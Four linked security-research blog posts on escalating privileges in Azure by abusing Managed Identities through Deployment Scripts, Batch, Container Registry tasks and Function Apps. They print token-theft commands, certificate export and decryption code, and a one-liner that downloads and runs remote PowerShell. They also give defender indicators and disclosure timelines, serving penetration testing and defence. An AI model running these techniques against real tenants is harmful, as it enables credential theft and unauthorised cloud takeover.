As Azure penetration testers, we often run into overly permissioned User-Assigned Managed Identities. This type of Managed Identity is a subscription-level resource that can be applied to multiple other Azure resources. Once applied to a resource, it allows that resource to use the associated Entra ID identity to authenticate and gain access to other Azure resources. These are typically used in cases where Azure engineers want to easily share specific permissions with multiple Azure resources. An attacker with the right permissions in a subscription can assign these identities to resources that they control and gain access to the permissions of the identity.
When we attempt to escalate our permissions with an available User-Assigned Managed Identity, we can typically choose from one of the following services to attach the identity to:
- Virtual Machines
- Azure Container Registries (ACR)
- Automation Accounts
- App Services (including Function Apps)
- Azure Kubernetes Service (AKS)
- Data Factory
- Logic Apps
- Deployment Scripts
Once we attach the identity to the resource, we can then use that service to generate a token (to use with Microsoft APIs) or take actions as that identity within the service. We’ve linked out on the above list to some blogs that show how to use those services to attack Managed Identities.
The last item on that list (Deployment Scripts) is a more recent addition (2023). After taking a look at Rogier Dijkman’s post - “Project Miaow (Privilege Escalation from an ARM template)” – we started making more use of the Deployment Scripts as a method for “borrowing” User-Assigned Managed Identities. We will use this post to expand on Rogier’s blog and show a new MicroBurst function that automates this attack.
TL;DR
- Attackers may get access to a role that allows assigning a Managed Identity to a resource
- Deployment Scripts allow attackers to attach a User-Assigned Managed Identity
- The Managed Identity can be used (via Az PowerShell or AZ CLI) to take actions in the Deployment Scripts container
- Depending on the permissions of the Managed Identity, this can be used for privilege escalation
- We wrote a tool to automate this process
What are Deployment Scripts?
As an alternative to running local scripts for configuring deployed Azure resources, the Azure Deployment Scripts service allows users to run code in a containerized Azure environment. The containers themselves are created as “Container Instances” resources in the Subscription and are linked to the Deployment Script resources. There is also a supporting “*azscripts” Storage Account that gets created for the storage of the Deployment Script file resources. This service can be a convenient way to create more complex resource deployments in a subscription, while keeping everything contained in one ARM template.
In Rogier’s blog, he shows how an attacker with minimal permissions can abuse their Deployment Script permissions to attach a Managed Identity (with the Owner Role) and promote their own user to Owner. During an Azure penetration test, we don’t often need to follow that exact scenario. In many cases, we just need to get a token for the Managed Identity to temporarily use with the various Microsoft APIs.
Automating the Process
In situations where we have escalated to some level of “write” permissions in Azure, we usually want to do a review of available Managed Identities that we can use, and the roles attached to those identities. This process technically applies to both System-Assigned and User-Assigned Managed Identities, but we will be focusing on User-Assigned for this post.
Link to the Script - https://github.com/NetSPI/MicroBurst/blob/master/Az/Invoke-AzUADeploymentScript.ps1
This is a pretty simple process for User-Assigned Managed Identities. We can use the following one-liner to enumerate all of the roles applied to a User-Assigned Managed Identity in a subscription:
Get-AzUserAssignedIdentity | ForEach-Object { Get-AzRoleAssignment -ObjectId $_.PrincipalId }
Keep in mind that the Get-AzRoleAssignment call listed above will only get the role assignments that your authenticated user can read. There is potential that a Managed Identity has permissions in other subscriptions that you don’t have access to. The Invoke-AzUADeploymentScript function will attempt to enumerate all available roles assigned to the identities that you have access to, but keep in mind that the identity may have roles in Subscriptions (or Management Groups) that you don’t have read permissions on.
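For readability, the one-liner above can be expanded to label each role assignment with the identity it belongs to. This is just a convenience sketch using standard Az module cmdlets, not part of MicroBurst:

# Convenience sketch: list each User-Assigned Managed Identity with its visible role assignments
Get-AzUserAssignedIdentity | ForEach-Object {
    $identity = $_
    Get-AzRoleAssignment -ObjectId $identity.PrincipalId |
        Select-Object @{n = 'Identity'; e = { $identity.Name }}, RoleDefinitionName, Scope
}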
Once we have an identity to target, we can assign it to a resource (a Deployment Script) and generate tokens for the identity. Below is an overview of how we automate this process in the Invoke-AzUADeploymentScript function:
- Enumerate available User-Assigned Managed Identities and their role assignments
- Select the identity to target
- Generate the malicious Deployment Script ARM template (a rough sketch of this step follows the list)
- Create a randomly named Deployment Script with the template
- Get the output from the Deployment Script
- Remove the Deployment Script and Resource Group Deployment
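For reference, here is a rough sketch of what the template step can look like when driven from the Az PowerShell module. This is illustrative only: the resource name and identity path are placeholders, and the actual MicroBurst template differs.

# Illustrative sketch - a deploymentScripts resource that attaches the target identity and echoes a token
$identityId = "/subscriptions/<subscriptionId>/resourceGroups/<rg>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<identityName>"
$template = @{
    '$schema'      = "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#"
    contentVersion = "1.0.0.0"
    resources      = @(@{
        type       = "Microsoft.Resources/deploymentScripts"
        apiVersion = "2020-10-01"
        name       = "example-deployment-script"   # hypothetical name
        location   = "[resourceGroup().location]"
        kind       = "AzurePowerShell"
        identity   = @{
            type                   = "UserAssigned"
            userAssignedIdentities = @{ $identityId = @{} }
        }
        properties = @{
            azPowerShellVersion = "8.3"
            scriptContent       = 'Connect-AzAccount -Identity | Out-Null; Write-Output (Get-AzAccessToken).Token'
            retentionInterval   = "PT1H"
        }
    })
}
New-AzResourceGroupDeployment -ResourceGroupName "<rg>" -TemplateObject $template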
Since there isn't an easy way to determine whether your current user can create a Deployment Script in a given Resource Group, the script assumes that you have Contributor (write) permissions on the Resource Group containing the User-Assigned Managed Identity, and it will use that Resource Group for the Deployment Script.
If you want to deploy your Deployment Script to a different Resource Group in the same Subscription, you can use the “-ResourceGroup” parameter. If you want to deploy your Deployment Script to a different Subscription in the same Tenant, use the “-DeploymentSubscriptionID” parameter and the “-ResourceGroup” parameter.
Finally, you can specify the scope of the tokens being generated by the function with the “-TokenScope” parameter.
Example Usage:
We have three different use cases for the function:
- Deploy to the Resource Group containing the target User-Assigned Managed Identity
Invoke-AzUADeploymentScript -Verbose
- Deploy to a different Resource Group in the same Subscription
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "ExampleRG"
- Deploy to a Resource Group in a different Subscription in the same tenant
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "OtherExampleRG" -DeploymentSubscriptionID "00000000-0000-0000-0000-000000000000"
*Where “00000000-0000-0000-0000-000000000000” is the Subscription ID that you want to deploy to, and “OtherExampleRG” is the Resource Group in that Subscription.
Additional Use Cases
Outside of the default action of generating temporary Managed Identity tokens, the function allows you to take advantage of the container environment to take actions with the Managed Identity from a (generally) trusted space. You can run specific commands as the Managed Identity using the “-Command” flag on the function. This is nice for obfuscating the source of your actions, as the usage of the Managed Identity will track back to the Deployment Script, versus using generated tokens away from the container.
Below are a couple of potential use cases and commands to use:
- Run commands on VMs
- Create RBAC Role Assignments
- Dump Key Vaults, Storage Account Keys, etc.
Since the function expects string data as the output from the Deployment Script, make sure that the output of your "-Command" parameter is formatted as a string, so your command output is actually returned.
Example:
Invoke-AzUADeploymentScript -Verbose -Command "Get-AzResource | ConvertTo-Json"
Lastly, if you're running any particularly complex commands, you may be better off loading your PowerShell code from an external source via the "-Command" parameter. Using the Invoke-Expression (IEX) function in PowerShell is a handy way to do this.
Example:
IEX(New-Object System.Net.WebClient).DownloadString('https://example.com/DeploymentExec.ps1') | Out-String
Indicators of Compromise (IoCs)
We’ve included the primary IoCs that defenders can use to identify these attacks. These are listed in the expected chronological order for the attack.
| Operation Name | Description |
| --- | --- |
| Microsoft.Resources/deployments/validate/action | Validate Deployment |
| Microsoft.Resources/deployments/write | Create Deployment |
| Microsoft.Resources/deploymentScripts/write | Write Deployment Script |
| Microsoft.Storage/storageAccounts/write | Create/Update Storage Account |
| Microsoft.Storage/storageAccounts/listKeys/action | List Storage Account Keys |
| Microsoft.ContainerInstance/containerGroups/write | Create/Update Container Group |
| Microsoft.Resources/deploymentScripts/delete | Delete Deployment Script |
| Microsoft.Resources/deployments/delete | Delete Deployment |
It’s important to note the final “delete” items on the list, as the function does clean up after itself and should not leave behind any resources.
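If you want to hunt for this activity, a rough starting point (assuming the Az.Monitor module and read access to the Activity Log) could look like the sketch below; the exact output shapes can vary between module versions:

# Rough triage sketch - pull a week of Activity Log entries and filter on the IoC operations above
$ops = 'Microsoft.Resources/deploymentScripts/write',
       'Microsoft.ContainerInstance/containerGroups/write',
       'Microsoft.Resources/deploymentScripts/delete'
Get-AzActivityLog -StartTime (Get-Date).AddDays(-7) |
    Where-Object { $ops -contains $_.Authorization.Action } |
    Select-Object EventTimestamp, Caller, ResourceGroupName, @{n = 'Operation'; e = { $_.Authorization.Action }}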
Conclusion
While Deployment Scripts and User-Assigned Managed Identities are convenient for deploying resources in Azure, administrators of an Azure subscription need to keep a close eye on the permissions granted to users and Managed Identities. A slightly over-permissioned user with access to a significantly over-permissioned Managed Identity is a recipe for a fast privilege escalation.
References:
- https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/deployment-script-template
- https://github.com/SecureHats/miaow/tree/main
Extracting Sensitive Information from the Azure Batch Service

We've recently seen an increased adoption of the Azure Batch service in customer subscriptions. As part of this, we've taken some time to dive into each component of the Batch service to help identify any potential areas for misconfigurations and sensitive data exposure. This research time has given us a few key areas to look at in the Azure Batch service, which we will cover in this blog.
TL;DR
- Azure Batch allows for scalable compute job execution
- Think large data sets and High Performance Computing (HPC) applications
- Attackers with Reader access to Batch can:
- Read sensitive data from job outputs
- Gain access to SAS tokens for Storage Account files attached to the jobs
- Attackers with Contributor access can:
- Run jobs on the batch pool nodes
- Generate Managed Identity tokens
- Gather Batch Access Keys for job execution persistence
The Azure Batch service functions as a middle ground between Azure Automation Accounts and a full deployment of an individual Virtual Machine to run compute jobs in Azure. This in-between space allows users of the service to spin up pools that have the necessary resource power, without the overhead of creating and managing a dedicated virtual system. This scalable service is well suited for high performance computing (HPC) applications, and easily integrates with the Storage Account service to support processing of large data sets.
While there is a bit of a learning curve for getting code to run in the Batch service, the added power and scalability of the service can help users run workloads significantly faster than some of the similar Azure services. But as with any Azure service, misconfigurations (or issues with the service itself) can unintentionally expose sensitive information.
Service Background - Pools
The Batch service relies on “Pools” of worker nodes. When the pools are created, there are multiple components you can configure that the worker nodes will inherit. Some important ones are highlighted here:
- User-Assigned Managed Identity
- Can be shared across the pool to allow workers to act as a specific Managed Identity
- Mount configuration
- Using a Storage Account Key or SAS token, you can add data storage mounts to the pool
- Application packages
- These are applications/executables that you can make available to the pool
- Certificates
- This is a feature that will be deprecated in 2024, but it could be used to make certificates available to the pool, including App Registration credentials
The last pool configuration item that we will cover is the “Start Task” configuration. The Start Task is used to set up the nodes in the pool, as they’re spun up.
The “Resource files” for the pool allow you to select blobs or containers to make available for the “Start Task”. The nice thing about the option is that it will generate the Storage Account SAS tokens for you.
While Contributor permissions are required to generate those SAS tokens, the tokens will get exposed to anyone with Reader permissions on the Batch account.
We have reported this issue to MSRC (see disclosure timeline below), as it’s an information disclosure issue, but this is considered expected application behavior. These SAS tokens are configured with Read and List permissions for the container, so an attacker with access to the SAS URL would have the ability to read all of the files in the Storage Account Container. The default window for these tokens is 7 days, so the window is slightly limited, but we have seen tokens configured with longer expiration times.
The last item that we will cover for the pool start task is the “Environment settings”. It’s not uncommon for us to see sensitive information passed into cloud services (regardless of the provider) via environmental variables. Your mileage may vary with each Batch account that you look at, but we’ve had good luck with finding sensitive information in these variables.
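As a quick way to eyeball those start task settings, something like the following sketch works, assuming you can obtain a BatchContext for the account (key retrieval requires the appropriate rights):

# Sketch: dump start task command lines and environment variables for each pool
$context = Get-AzBatchAccountKey -AccountName "<batchAccountName>"
Get-AzBatchPool -BatchContext $context | ForEach-Object {
    [PSCustomObject]@{
        Pool        = $_.Id
        CommandLine = $_.StartTask.CommandLine
        EnvVars     = ($_.StartTask.EnvironmentSettings |
                          ForEach-Object { "$($_.Name)=$($_.Value)" }) -join '; '
    }
}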
Service Background - Jobs
Once a pool has been configured, it can have jobs assigned to it. Each job has tasks that can be assigned to it. From a practical perspective, you can think of tasks as the same as the pool start tasks. They share many of the same configuration settings, but they just define the task level execution, versus the pool level. There are differences in how each one is functionally used, but from a security perspective, we’re looking at the same configuration items (Resource Files, Environment Settings, etc.).
Generating Managed Identity Tokens from Batch
With Contributor rights on the Batch service, we can create new (or modify existing) pools, jobs, and tasks. By modifying existing configurations, we can make use of the already assigned Managed Identities.
If there's a User-Assigned Managed Identity that you'd like to generate tokens for that isn't already used in Batch, your best bet is to create a new pool. Keep in mind that pool creation can be a little difficult; when we started investigating the service, we had to request a pool quota increase just to start using it.
To generate Managed Identity Tokens with the Jobs functionality, we will need to create new tasks to run under a job. Jobs need to be in an “Active” state to add a new task to an existing job. Jobs that have already completed won’t let you add new tasks.
In any case, you will need to make a call to the IMDS service, much like you would for a typical Virtual Machine, or a VM Scale Set Node.
(Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing).Content
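To run that same IMDS request as a Batch task, a minimal sketch looks like the following. The job and task IDs are hypothetical, and this assumes a Windows pool and a job in the Active state:

# Sketch: add a task to an Active job that echoes a Managed Identity token to the task output
$context = Get-AzBatchAccountKey -AccountName "<batchAccountName>"
$imds = 'powershell -c "(Invoke-WebRequest -Uri ''http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/'' -Headers @{Metadata=''true''} -UseBasicParsing).Content"'
New-AzBatchTask -JobId "<activeJobId>" -Id "token-task" -CommandLine $imds -BatchContext $context
# The token can then be read from the task's stdout.txt output file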
To make Managed Identity token generation easier, we’ve included some helpful shortcuts in the MicroBurst repository - https://github.com/NetSPI/MicroBurst/tree/master/Misc/Shortcuts
If you’re new to escalating with Managed Identities in Azure, here are a few posts that will be helpful:
- Azure Privilege Escalation Using Managed Identities - NetSPI
- Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps - NetSPI
- Managed Identity Attack Paths, Part 1: Automation Accounts - Andy Robbins, SpecterOps
Alternatively, you may also be able to directly access the nodes in the pool via RDP or SSH. This can be done by navigating the Batch resource menus into the individual nodes (Batch Account -> Pools -> Nodes -> Name of the Node -> Connect). From here, you can generate credentials for a local user account on the node (or use an existing user) and connect to the node via SSH or RDP.
Once you’ve authenticated to the node, you will have full access to generate tokens and access files on the host.
Exporting Certificates from Batch Nodes
While this part of the service is being deprecated (February 29, 2024), we thought it would be good to highlight how an attacker might be able to extract certificates from existing node pools. It’s unclear how long those certificates will stick around after they’ve been deprecated, so your mileage may vary.
If there are certificates configured for the Pool, you can review them in the pool settings.
Once you have the certificate locations identified (either CurrentUser or LocalMachine), appropriately modify and use the following commands to export the certificates to Base64 data. You can run these commands via tasks, or by directly accessing the nodes.
$mypwd = ConvertTo-SecureString -String "TotallyNotaHardcodedPassword..." -Force -AsPlainText
Get-ChildItem -Path cert:\currentUser\my\ | ForEach-Object {
    try {
        Export-PfxCertificate -cert $_.PSPath -FilePath (-join($_.PSChildName,'.pfx')) -Password $mypwd | Out-Null
        [Convert]::ToBase64String([IO.File]::ReadAllBytes((-join($PWD,'\',$_.PSChildName,'.pfx'))))
        Remove-Item (-join($PWD,'\',$_.PSChildName,'.pfx'))
    } catch {}
}
Once you have the Base64 versions of the certificates, set the $b64 variable to the certificate data and use the following PowerShell code to write the file to disk.
$b64 = "MII...[Your Base64 Certificate Data]"
[IO.File]::WriteAllBytes("$PWD\testCertificate.pfx", [Convert]::FromBase64String($b64))
Note that the PFX certificate uses "TotallyNotaHardcodedPassword..." as a password. You can change the password in the first line of the extraction code.
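If you'd rather work with the certificate from your local store, the exported PFX can be imported with that same password. A small sketch, assuming a Windows host with the PKI module available:

# Import the reconstructed PFX into the current user's certificate store
$pfxPwd = ConvertTo-SecureString -String "TotallyNotaHardcodedPassword..." -Force -AsPlainText
Import-PfxCertificate -FilePath "$PWD\testCertificate.pfx" -CertStoreLocation Cert:\CurrentUser\My -Password $pfxPwd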
Automating Information Gathering
Since we are most commonly assessing an Azure environment with the Reader role, we wanted to automate the collection of a few key Batch account configuration items. To support this, we created the “Get-AzBatchAccountData” function in MicroBurst.
The function collects the following information:
- Pools Data
- Environment Variables
- Start Task Commands
- Available Storage Container URLs
- Jobs Data
- Environment Variables
- Tasks (Job Preparation, Job Manager, and Job Release)
- Jobs Sub-Tasks
- Available Storage Container URLs
- With Contributor Level Access
- Primary and Secondary Keys for Triggering Jobs
While I’m not a big fan of writing output to disk, this was the cleanest way to capture all of the data coming out of available Batch accounts.
Tool Usage:
Authenticate to the Az PowerShell module (Connect-AzAccount), import the “Get-AzBatchAccountData.ps1” function from the MicroBurst Repo, and run the following command:
PS C:\> Get-AzBatchAccountData -folder BatchOutput -Verbose
VERBOSE: Logged In as kfosaaen@example.com
VERBOSE: Dumping Batch Accounts from the "Sample Subscription" Subscription
VERBOSE: 1 Batch Account(s) Enumerated
VERBOSE: Attempting to dump data from the testspi account
VERBOSE: Attempting to dump keys
VERBOSE: 1 Pool(s) Enumerated
VERBOSE: Attempting to dump pool data
VERBOSE: 13 Job(s) Enumerated
VERBOSE: Attempting to dump job data
VERBOSE: Completed dumping of the testspi account
This should create an output folder (BatchOutput) with your output files (Jobs, Keys, Pools). Depending on your permissions, you may not be able to dump the keys.
Conclusion
As part of this research, we reached out to MSRC on the exposure of the Container Read/List SAS tokens. The issue was initially submitted in June of 2023 as an information disclosure issue. Given the low priority of the issue, we followed up in October of 2023. We received the following email from MSRC on October 27th, 2023:
We determined that this behavior is considered to be 'by design'. Please find the notes below.
Analysis Notes: This behavior is as per design. Azure Batch API allows for the user to provide a set of urls to storage blobs as part of the API. Those urls can either be public storage urls, SAS urls or generated using managed identity. None of these values in the API are treated as “private”. If a user has permissions to a Batch account then they can view these values and it does not pose a security concern that requires servicing.
In general, we’re not seeing a massive adoption of Batch accounts in Azure, but we are running into them more frequently and we’re finding interesting information. This does seem to be a powerful Azure service, and (potentially) a great one to utilize for escalations in Azure environments.
Automating Managed Identity Token Extraction in Azure Container Registries

In the ever-evolving landscape of containerized applications, Azure Container Registry (ACR) is one of the more commonly used services in Azure for the management and deployment of container images. ACR not only serves as a secure and scalable repository for Docker images, but also offers a suite of powerful features to streamline management of the container lifecycle. One of those features is the ability to run build and configuration scripts through the "Tasks" functionality.
This functionality does have some downsides, as it can be abused by attackers to generate tokens for any Managed Identities that are attached to the ACR. In this blog post, we will show the processes used to create a malicious ACR task that can be used to export tokens for Managed Identities attached to an ACR. We will also show a new tool within MicroBurst that can automate this whole process for you.
TL;DR
- Azure Container Registries (ACRs) can have attached Managed Identities
- Attackers can create malicious tasks in the ACR that generate and export tokens for the Managed Identities
- We've created a tool in MicroBurst (Invoke-AzACRTokenGenerator) that automates this attack path
Previous Research
To be fully transparent, this blog and tooling was a result of trying to replicate some prior research from Andy Robbins (Abusing Azure Container Registry Tasks) that was well documented, but lacked copy and paste-able commands that I could use to recreate the attack. While the original blog focuses on overwriting existing tasks, we will be focusing on creating new tasks and automating the whole process with PowerShell. A big thank you to Andy for the original research, and I hope this tooling helps others replicate the attack.
Attack Process Overview
Here is the general attack flow that we will be following:
- The attacker has Contributor (Write) access on the ACR
- Technically, you could also poison existing ACR task files in a GitHub repo, but the previous research (noted above) does a great job of explaining that issue
- The attacker creates a malicious YAML task file
- The task authenticates to the Az CLI as the Managed Identity, then generates a token
- A Task is created with the AZ CLI and the YAML file
- The Task is run in the ACR Task container
- The token is written to the Task output, then retrieved by the attacker
If you want to replicate the attack using the AZ CLI, use the following steps:
- Authenticate to the AZ CLI (AZ Login) with an account with the Contributor role on the ACR
- Identify the available Container Registries with the following command:
az acr list
- Write the following YAML to a local file (.\taskfile)
version: v1.1.0
steps:
- cmd: az login --identity --allow-no-subscriptions
- cmd: az account get-access-token
- Note that this assumes you are using a System-Assigned Managed Identity; if you're using a User-Assigned Managed Identity, you will need to add "--username <client_id|object_id|resource_id>" to the login command
- Create the task in the ACR ($ACRName) with the following command
az acr task create --registry $ACRName --name sample_acr_task --file .\taskfile --context /dev/null --only-show-errors --assign-identity [system]
- If you're using a User-Assigned Managed Identity, replace [system] with the resource path ("/subscriptions/<subscriptionId>/resourcegroups/<myResourceGroup>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<myUserAssignedIdentity>") for the identity you want to use
- Use the following command to run the task in the ACR
az acr task run -n sample_acr_task -r $acrName
- The task output, including the token, should be displayed in the output for the run command.
- Next, we will want to delete the task with the following command
az acr task delete -n sample_acr_task -r $acrName -y
Please note that while the task may be deleted, the "Runs" of the task will still show up in the ACR. Since Managed Identity tokens have a limited shelf-life, this isn't a huge concern, but it would expose the token to anyone with the Reader role on the ACR. If you are concerned about this, feel free to modify the task definition to use another method (HTTP POST) to exfiltrate the token.
Invoke-AzACRTokenGenerator Usage/overview
To automate this process, we added the Invoke-AzACRTokenGenerator function to the MicroBurst toolkit. The function follows the above methodology and uses a mix of the Az PowerShell module cmdlets and REST API calls to replace the AZ CLI commands.
A couple of things to note:
- The function will prompt (via Out-GridView) you for a Subscription to use and for the ACRs that you want to target
- Keep in mind that you can multi-select (Ctrl+click) Subscriptions and ACRs to help exploit multiple targets at once
- By default, the function generates tokens for the "Management" (https://management.azure.com/) service
- If you want to specify a different scope endpoint, you can do so with the -TokenScope parameter.
- Two commonly used options:
- https://graph.microsoft.com/ - Used for accessing the Graph API
- https://vault.azure.net – Used for accessing the Key Vault API
- The Output is a Data Table Object that can be assigned to a variable
- $tokens = Invoke-AzACRTokenGenerator
- This can also be appended with a "+=" to add tokens to the object
- This is handy for storing multiple token scopes (Management, Graph, Vault) in one object (see the usage sketch after this list)
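As a hedged usage example, here is one way to put a collected token to work against the ARM REST API. The row access and column name are assumptions about the tool's output, so adjust to what you actually get back:

# Sketch: use a collected token against the ARM REST API
$tokens = Invoke-AzACRTokenGenerator
$mgmtToken = ($tokens | Select-Object -First 1).access_token   # assumed column name - verify against your output
Invoke-RestMethod -Uri "https://management.azure.com/subscriptions?api-version=2020-01-01" -Headers @{ Authorization = "Bearer $mgmtToken" }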
This command will be imported with the rest of the MicroBurst module, but you can use the following command to manually import the function into your PowerShell session:
Import-Module .\MicroBurst\Az\Invoke-AzACRTokenGenerator.ps1
Once imported, the function is simple to use:
Invoke-AzACRTokenGenerator -Verbose
Indicators of Compromise (IoCs)
To better support the defenders out there, we've included some IoCs that you can look for in your Azure activity logs to help identify this kind of attack.
| Operation Name | Description |
| --- | --- |
| Microsoft.ContainerRegistry/registries/tasks/write | Create or update a task for a container registry. |
| Microsoft.ContainerRegistry/registries/scheduleRun/action | Schedule a run against a container registry. |
| Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action | Get the log SAS URL for a run. |
| Microsoft.ContainerRegistry/registries/tasks/delete | Delete a task for a container registry. |
Conclusion
The Azure ACR tasks functionality is very helpful for automating the lifecycle of a container, but permissions misconfigurations can allow attackers to abuse attached Managed Identities to move laterally and escalate privileges.
If you’re currently using Azure Container Registries, make sure you review the permissions assigned to the ACRs, along with any permissions assigned to attached Managed Identities. It would also be worthwhile to review permissions on any tasks that you have stored in GitHub, as those could be vulnerable to poisoning attacks. Finally, defenders should look at existing task files to see if there are any malicious tasks, and make sure that you monitor the actions that we noted above.
Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps

As we were preparing our slides and tools for our DEF CON Cloud Village Talk (What the Function: A Deep Dive into Azure Function App Security), Thomas Elling and I stumbled onto an extension of some existing research that we disclosed on the NetSPI blog in March of 2023. We had started working on a function that could be added to a Linux container-based Function App to decrypt the container startup context that is passed to the container on startup. As we got further into building the function, we found that the decrypted startup context disclosed more information than we had previously realized.
TL;DR
- The Linux containers in Azure Function Apps utilize an encrypted start up context file hosted in Azure Storage Accounts
- The Storage Account URL and the decryption key are stored in the container environmental variables and are available to anyone with the ability to execute commands in the container
- This startup context can be decrypted to expose sensitive data about the Function App, including the certificates for any attached Managed Identities, allowing an attacker to gain persistence as the Managed Identity. As of November 11, 2023, this issue has been fully addressed by Microsoft.
In the earlier blog post, we utilized an undocumented Azure Management API (as the Azure RBAC Reader role) to complete a directory traversal attack to gain access to the proc file system files. This allowed access to the environmental variables (/proc/self/environ) used by the container. These environmental variables (CONTAINER_ENCRYPTION_KEY and CONTAINER_START_CONTEXT_SAS_URI) could then be used to decrypt the startup context of the container, which included the Function App keys. These keys could then be used to overwrite the existing Function App Functions and gain code execution in the container. At the time of the previous research, we had not investigated the impact of having a Managed Identity attached to the Function App.
As part of the DEF CON Cloud Village presentation preparation, we wanted to provide code for an Azure function that would automate the decryption of this startup context in the Linux container. This could be used as a shortcut for getting access to the function keys in cases where someone has gained command execution in a Linux Function App container, or gained Storage Account access to the supporting code hosting file shares.
Here is the PowerShell sample code that we started with:
using namespace System.Net

# Input bindings are passed in via param block.
param($Request, $TriggerMetadata)

$encryptedContext = (Invoke-RestMethod $env:CONTAINER_START_CONTEXT_SAS_URI).encryptedContext.split(".")
$key = [System.Convert]::FromBase64String($env:CONTAINER_ENCRYPTION_KEY)
$iv = [System.Convert]::FromBase64String($encryptedContext[0])
$encryptedBytes = [System.Convert]::FromBase64String($encryptedContext[1])
$aes = [System.Security.Cryptography.AesManaged]::new()
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aes.Key = $key
$aes.IV = $iv
$decryptor = $aes.CreateDecryptor()
$plainBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length)
$plainText = [System.Text.Encoding]::UTF8.GetString($plainBytes)
$body = $plainText

# Associate values to output bindings by calling 'Push-OutputBinding'.
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
    StatusCode = [HttpStatusCode]::OK
    Body = $body
})
At a high level, this PowerShell code fetches the encrypted context from the SAS-tokened URL stored in the environment variable, sets the decryption key from the corresponding environment variable, takes the IV from the first section of the encrypted context, and then completes the AES decryption, outputting the fully decrypted context to the HTTP response.
When building this code, we used an existing Function App in our subscription that had a Managed Identity attached to it. Upon inspection of the decrypted startup context, we noticed a previously overlooked "MSISpecializationPayload" section of the configuration that contained a list of Identities attached to the Function App.
"MSISpecializationPayload": { "SiteName": "notarealfunctionapp", "MSISecret": "57[REDACTED]F9", "Identities": [ { "Type": "SystemAssigned", "ClientId": " b1abdc5c-3e68-476a-9191-428c1300c50c", "TenantId": "[REDACTED]", "Thumbprint": "BC5C431024BC7F52C8E9F43A7387D6021056630A", "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]/", "ResourceId": "", "Certificate": "MIIK[REDACTED]H0A==", "PrincipalId": "[REDACTED]", "AuthenticationEndpoint": null }, { "Type": "UserAssigned", "ClientId": "[REDACTED]", "TenantId": "[REDACTED]", "Thumbprint": "B8E752972790B0E6533EFE49382FF5E8412DAD31", "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]", "ResourceId": "/subscriptions/[REDACTED]/Microsoft.ManagedIdentity/userAssignedIdentities/[REDACTED]", "Certificate": "MIIK[REDACTED]0A==", "PrincipalId": "[REDACTED]", "AuthenticationEndpoint": null } ], [Truncated]
In each identity listed (SystemAssigned and UserAssigned), there was a “Certificate” section that contained Base64 encoded data, that looked like a private certificate (starts with “MII…”). Next, we decoded the Base64 data and wrote it to a file. Since we assumed that this was a PFX file, we used that as the file extension.
$b64 = "MIIK[REDACTED]H0A=="
[IO.File]::WriteAllBytes("C:\temp\micert.pfx", [Convert]::FromBase64String($b64))
We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c).
After installing the certificate, we were then able to use the certificate to authenticate to the Az PowerShell module as the Managed Identity.
PS C:\> Connect-AzAccount -ServicePrincipal -Tenant [REDACTED] -CertificateThumbprint BC5C431024BC7F52C8E9F43A7387D6021056630A -ApplicationId b1abdc5c-3e68-476a-9191-428c1300c50c

Account                              SubscriptionName TenantId   Environment
-------                              ---------------- --------   -----------
b1abdc5c-3e68-476a-9191-428c1300c50c Research         [REDACTED] AzureCloud
For anyone who has worked with Managed Identities in Azure, you’ll immediately know that this fundamentally breaks the intended usage of a Managed Identity on an Azure resource. Managed Identity credentials are never supposed to be accessed by users in Azure, and the Service Principal App Registration (where you would validate the existence of these credentials) for the Managed Identity isn’t visible in the Azure Portal. The intent of Managed Identities is to grant temporary token-based access to the identity, only from the resource that has the identity attached.
While the Portal UI restricts visibility into the Service Principal App Registration, the details are available via the Get-AzADServicePrincipal Az PowerShell function. The exported certificate files have a 6-month (180 day) expiration date, but the actual credential storage mechanism in Azure AD (now Entra ID) has a 3-month (90 day) rolling rotation for the Managed Identity certificates. On the plus side, certificates are not deleted from the App Registration after the replacement certificate has been created. Based on our observations, it appears that you can make use of the full 3-month life of the certificate, with one month overlapping the new certificate that is issued.
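To see those credential windows for yourself, the key credentials on the Managed Identity's service principal can be listed with the Az PowerShell module. A small sketch, using the Service Principal ID from the example above; property names may differ between module versions:

# List the certificate credentials (and validity windows) on the Managed Identity's service principal
Get-AzADServicePrincipal -ApplicationId "b1abdc5c-3e68-476a-9191-428c1300c50c" |
    Get-AzADSpCredential |
    Select-Object KeyId, StartDateTime, EndDateTime
# If pipeline binding misbehaves in your module version, pass -ObjectId to Get-AzADSpCredential directly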
It should be noted that while this proof of concept shows exploitation through Contributor level access to the Function App, any attacker that gained command execution on the Function App container would have been able to execute this attack and gain access to the attached Managed Identity credentials and Function App keys. There are a number of ways that an attacker could get command execution in the container, which we’ve highlighted a few options in the talk that originated this line of research.
Conclusion / MSRC Response
At this point in the research, we quickly put together a report and filed it with MSRC. Here’s what the process looked like:
- 7/12/23 - Initial discovery of the issue and filing of the report with MSRC
- 7/13/23 – MSRC opens Case 80917 to manage the issue
- 8/02/23 – NetSPI requests update on status of the issue
- 8/03/23 – Microsoft closes the case and issues the following response:
Hi Karl,
Thank you for your patience.
MSRC has investigated this issue and concluded that this does not pose an immediate threat that requires urgent attention. This is because, for an attacker or user who already has publish access, this issue did not provide any additional access than what is already available. However, the teams agree that access to relevant filesystems and other information needs to be limited.
The teams are working on the fix for this issue per their timelines and will take appropriate action as needed to help keep customers protected.
As such, this case is being closed.
